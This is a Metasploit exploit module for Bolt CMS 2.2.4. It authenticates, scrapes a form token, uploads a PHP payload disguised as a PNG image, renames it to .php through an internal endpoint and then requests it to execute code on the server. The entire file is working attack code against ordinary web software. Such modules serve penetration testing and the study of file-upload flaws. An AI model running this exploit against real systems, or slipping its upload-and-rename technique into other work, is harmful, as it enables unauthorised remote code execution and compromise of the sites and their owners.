##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'CMS Bolt File Upload Vulnerability',
      'Description'     => %q{
          Bolt CMS contains a flaw that allows an authenticated remote
          attacker to execute arbitrary PHP code. This module was
          tested on version 2.2.4.
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Tim Coen', # Vulnerability Disclosure
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
        ],
      'References'      =>
        [
          ['URL', 'http://blog.curesec.com/article/blog/Bolt-224-Code-Execution-44.html']
        ],
      'DisclosureDate'  => 'Aug 17 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['Bolt 2.2.4', {}]],
      'DefaultTarget'   => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI',  [true, 'The base path to the web application', '/']),
        OptString.new('FOLDERNAME', [true, 'The theme path to the web application (default: base-2014)', 'base-2014']),
        OptString.new('USERNAME',   [true, 'The username to authenticate with']),
        OptString.new('PASSWORD',   [true, 'The password to authenticate with'])
      ], self.class)
  end

  def check
    cookie = bolt_login(username, password)
    return Exploit::CheckCode::Detected unless cookie

    res = send_request_cgi(
      'method'      => 'GET',
      'uri'         => normalize_uri(target_uri.path, 'bolt'),
      'cookie'      => cookie
    )

    if res && res.code == 200 && res.body.include?('Bolt 2.2.4</b>: Sophisticated, lightweight & simple CMS')
      return Exploit::CheckCode::Vulnerable
    end
    Exploit::CheckCode::Safe
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def fname
    datastore['FOLDERNAME']
  end

  def bolt_login(user, pass)
    res = send_request_cgi(
      'method'      => 'GET',
      'uri'         => normalize_uri(target_uri.path, 'bolt', 'login')
    )

    fail_with(Failure::Unreachable, 'No response received from the target.') unless res

    session_cookie = res.get_cookies
    vprint_status("#{peer} - Logging in...")
    res = send_request_cgi(
      'method'      => 'POST',
      'uri'         => normalize_uri(target_uri.path, 'bolt', 'login'),
      'cookie'      => session_cookie,
      'vars_post'   => {
        'username'  => user,
        'password'  => pass,
        'action'    => 'login'
      }
    )

    return res.get_cookies if res && res.code == 302 && res.redirection.to_s.include?('/bolt')
    nil
  end

  def get_token(cookie, fname)
    res = send_request_cgi(
      'method'      => 'GET',
      'uri'         => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname),
      'cookie'      => cookie
    )

    if res && res.code == 200 && res.body =~ / name="form\[_token\]" value="(.+)" /
      return Regexp.last_match[1]
    end
    nil
  end

  def rename_payload(cookie, payload, fname)
    res = send_request_cgi(
      'method'      => 'POST',
      'uri'         => normalize_uri(target_uri.path, 'async', 'renamefile'),
      'vars_post'   => {
        'namespace' => 'theme',
        'parent'    => fname,
        'oldname'   => "#{payload}.png",
        'newname'   => "#{payload}.php"
      },
      'cookie'      => cookie
    )

    return true if res && res.code == 200 && res.body.include?('1')
    nil
  end

  def exploit
    vprint_status("#{peer} - Authenticating using #{username}:#{password}")

    cookie = bolt_login(username, password)
    fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
    vprint_good("#{peer} - Authenticated with Bolt.")

    token = get_token(cookie, fname)
    fail_with(Failure::Unknown, 'No token found.') if token.nil?
    vprint_good("#{peer} - Token \"#{token}\" found.")

    vprint_status("#{peer} - Preparing payload...")
    payload_name = Rex::Text.rand_text_alpha_lower(10)

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"form[FileUpload][]\"; filename=\"#{payload_name}.png\"")
    data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"')
    post_data = data.to_s

    vprint_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname),
      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
      'data'      => post_data,
      'cookie'    => cookie
    )

    fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 302
    vprint_good("#{peer} - Uploaded the payload.")

    rename = rename_payload(cookie, payload_name, fname)
    fail_with(Failure::Unknown, 'No renamed filename.') if rename.nil?

    php_file_name = "#{payload_name}.php"
    payload_url = normalize_uri(target_uri.path, 'theme', fname, php_file_name)
    vprint_status("#{peer} - Parsed response.")

    register_files_for_cleanup(php_file_name)
    vprint_status("#{peer} - Executing the payload at #{payload_url}.")
    send_request_cgi(
      'uri'     => payload_url,
      'method'  => 'GET'
    )
  end
end